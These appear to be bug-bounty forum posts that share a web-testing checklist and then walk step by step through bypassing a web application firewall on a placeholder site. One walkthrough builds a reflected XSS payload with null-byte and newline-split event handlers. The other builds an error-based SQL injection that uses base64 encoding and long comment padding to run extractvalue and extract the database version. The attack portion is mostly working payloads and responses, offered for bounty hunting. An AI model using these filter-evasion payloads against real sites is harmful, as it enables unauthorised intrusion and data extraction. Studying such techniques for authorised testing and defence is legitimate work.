Just as brother Dawood posted a book on Tips and tricks an hour ago, here is a second book, light and fun, that can help you when checking off the vulnerabilities you can look for before you get bored of a particular program:
https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Good luck to everyone. Happy hacking ✌️
Xss
Hello Waf
site.com/cart/11?input=admin reflected
site.com/cart/11?input=admin' reflected admin'
site.com/cart/11?input=admin'" reflected admin'"
site.com/cart/11?input=admin'"> reflected admin'">
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin>< reflected
site.com/cart/11?input=admin'>< reflected
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin"<> reflected
site.com/cart/11?input=admin"<svg Access Denied 403
site.com/cart/11?input=admin"<1 Access Denied 403
hey waf
site.com/cart/11?input=leet"%00<svg reflected bypassed
site.com/cart/11?input?leet"%00<svg/OnlOad= Access Denied 403
site.com/cart/11?input?leet"%00<svg/OnlOads= event handler :(
All are blocked
site.com/cart/11?input?leet"%00<svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3d Reflected Bypassed
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm(1)
Access Denied 403
Final Payload
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm%601%60>
Bounty $$$+Extra for bypassing waf
Hey Blind Sql ?
Hey Error Based?
1. site.com/search/test 200
2. site.com/search/test' Error
Something has gone wrong and this URL cannot be processed at this time.
3. site.com/search/test--+ Disallowed Key Characters in URL.
4. site.com/search/dGVzdA== test encoded base64
result. Your search for test returned 183 results
5. site.com/search/dGVzdCc= test' base64
result. Your search for test not found
6. https://www.site.com/search/dGVzdCctLSs= test'--+ base64
result. Your search for test returned 183 results
7. test' order by 1--+ not found
8. test'--+ result found
9. test' and extractvalue(0x0a,concat(0x0a,(select version())))--+ 403
10. test' and extractvalue/**_**/(0x0a,concat/**_**/(0x0a,(select/**_**/version())))--+ 403
11. test' and extractvalue%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,concat%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,(select%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0aversion())))--+
hey version Found
bounty $$$$$
The website https://www.bugbountyhunter.com did something really nice: they published all the publicly disclosed reports on HackerOne, sorted by vulnerability type for each program. So now you can learn the vulnerability types better, and it will help you understand the program you are working on better.